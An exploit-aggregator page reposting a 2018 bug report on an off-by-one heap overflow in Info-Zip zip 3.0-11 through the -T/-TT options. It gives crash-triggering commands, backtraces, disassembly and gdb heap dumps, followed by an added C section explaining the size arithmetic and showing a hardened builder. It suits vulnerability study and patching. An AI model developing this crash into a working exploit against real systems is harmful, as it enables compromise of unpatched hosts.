Info-Zip Zip 3.0-11 Crash

CVE: CVE-2018-9834
Category: CWE-119
Price: $5000
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Local
Date: 2018-07-09
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
EPSS: 0.04421
EPSSP: 0.74601

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070091

Below is a copy:

Info-Zip Zip 3.0-11 Crash
Hello,

I found a crash in info-zip's zip command.
This vulnerability is caused by an off-by-one.
I don't use a malformed file for the crash, just a command.

And if the 'zip' binary is added to a function, it can be an exploitable vulnerability, I think.

[ Environment ]

OS : Ubuntu 16.04.3 LTS
Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
info-zip zip : 3.0-11

[ Condition ]

* using option -T, -TT
* The vulnerability is caused by an off-by-one.
: Linux command execution using option -T, -TT
: To execute the command given with the -T and -TT options, zip stores it on the heap before calling system(), and the stored data is built as follows:
: 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip'
: 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: When the command is stored on the heap, the off-by-one occurs (the allocation is one byte short of the string plus its terminator).
: It happens in the code below.
Disassembly -
.text:000000000040A052                 mov     rax, [rsp+48h+var_40]
.text:000000000040A057                 mov     word ptr [r15+rax+2], 27h
Hex-Rays -
*(_WORD *)&v7[v16 + 2] = 0x27;


[ Error Msg ]

CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA'  <- process dies
sh: 1: AAAAAAAAAAAA: not found
*** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========


zip error: Interrupted (aborting)
*** Error in `zip': free(): invalid pointer: 0x00000000009ef370 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x40873e]
zip[0x4090cb]
zip[0x409279]
/lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0]
/lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428]
/lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a]
/lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========


CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'  <- process does not die

sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAA: not found
*** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913]
/lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5]
/lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241]
/lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9]
zip[0x40a0a4]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830]
zip[0x408529]
======= Memory map: ========


zip error: Interrupted (aborting)


[ Debugging ]
set follow-fork-mode parent
b*0x0000000000409F13
b*0x0000000000409E11
r flagT.zip -T -TT 'AAAAAAAAAAAA'

* Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA'
: this case mallocs 0x18 bytes.
: so, the next chunk's size field is overwritten with a null byte (off by one).
# Not Crash
pwndbg> x/32gx 0x67f340
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x616c662720414141
0x67f360: 0x002770697a2e5467 0x00000000000000c1 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78

# Crash
0x67f340: 0x0000000000000230 0x0000000000000020
0x67f350: 0x4141414141414141 0x6c66272041414141
0x67f360: 0x2770697a2e546761 0x0000000000000000 <- off by one
0x67f370: 0x00000000000a031e 0x000000004ce40567
0x67f380: 0x0000000040a61838 0x0000000000000003
0x67f390: 0x0000000000000003 0x0000001800000004
0x67f3a0: 0x0000000000000000 0x0000000000000001
0x67f3b0: 0x0000000000000000 0x0000000081b40000
0x67f3c0: 0x000000000067f490 0x0000000000000000
0x67f3d0: 0x000000000067f450 0x0000000000000000
0x67f3e0: 0x000000000067f430 0x000000000067f470
0x67f3f0: 0x000000000067f4d0 0x0000000000000000
0x67f400: 0x0000000000000000 0x0000000000000000
0x67f410: 0x0000000000000000 0x0000000000000000
0x67f420: 0x0000000000000000 0x0000000000000021
0x67f430: 0x00007f0067616c66 0x00007ffff7bc1b78

* Case 2 :  zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
# crash
: before __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x6c66272041414141
0x67f190: 0x2770697a2e546761 0x0000000000000100 <- off by one
          ^
          prev_size

# not crash
: before __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000041
0x67f160: 0x000000000067f0b0 0x4141414141414141
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x00000000000001f1

: after __fprintf_chk@plt <0x402330>
0x67f150: 0x0000000000000000 0x0000000000000251
0x67f160: 0x00007ffff7bc1db8 0x00007ffff7bc1db8
0x67f170: 0x4141414141414141 0x4141414141414141
0x67f180: 0x4141414141414141 0x616c662720414141
0x67f190: 0x002770697a2e5467 0x0000000000000211
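The size arithmetic behind the [Condition] table and the clobbered size fields in the [Debugging] dumps, as an added C example that is not part of the original report or of zip's source: the len + len + 3 rule in reported_alloc is inferred from the reported 0x18/0x38/0x58 sizes (an assumption, not verified against zip's code), glibc_usable models the allocator's chunk rounding on x86-64, and build_cmd_safe is the hardened form of the builder.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Length the stored form  <cmd> '<zipname>'  really needs: the text plus its NUL. */
size_t bytes_needed(const char *cmd, const char *zipname)
{
    return strlen(cmd) + 2 + strlen(zipname) + 1 + 1;   /* cmd, " '", name, "'", NUL */
}

/* Allocation size that reproduces the report's 0x18 / 0x38 / 0x58 for 12 / 44 / 76
   'A's plus "flagT.zip" (assumption: len + len + 3, i.e. the NUL is not counted). */
size_t reported_alloc(const char *cmd, const char *zipname)
{
    return strlen(cmd) + strlen(zipname) + 3;
}

/* glibc x86-64 chunk rounding: request plus the 8-byte size field, rounded up to
   16, minimum 32; the usable bytes are the chunk size minus that size field. */
size_t glibc_usable(size_t request)
{
    size_t chunk = (request + 8 + 15) & ~(size_t)15;
    if (chunk < 32) chunk = 32;
    return chunk - 8;
}

/* True when the request fills the chunk exactly, so the byte stored at index
   request (the NUL) lands on the low byte of the next chunk's size field. */
int nul_hits_next_size(size_t request)
{
    return glibc_usable(request) == request;
}

/* What that one NUL does to the neighbour's size field (0x1f1 -> 0x100 in Case 2). */
uint64_t clobbered_size(uint64_t next_chunk_size)
{
    return next_chunk_size & ~(uint64_t)0xff;
}

/* Hardened builder: size the buffer from the formatted length and never truncate. */
char *build_cmd_safe(const char *cmd, const char *zipname)
{
    int n = snprintf(NULL, 0, "%s '%s'", cmd, zipname);
    if (n < 0) return NULL;
    size_t len = (size_t)n + 1;                       /* room for the terminator */
    char *buf = malloc(len);
    if (buf == NULL) return NULL;
    if (snprintf(buf, len, "%s '%s'", cmd, zipname) != n) { free(buf); return NULL; }
    return buf;
}
```

Every request size in the report satisfies nul_hits_next_size, which is why one stray NUL is enough to zero the low byte of the adjacent chunk's size (0xc1 -> 0x00 in Case 1, 0x1f1 -> 0x100 in Case 2) and trip glibc's free() and malloc() consistency checks.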


Copyright ©2024 Exploitalert.
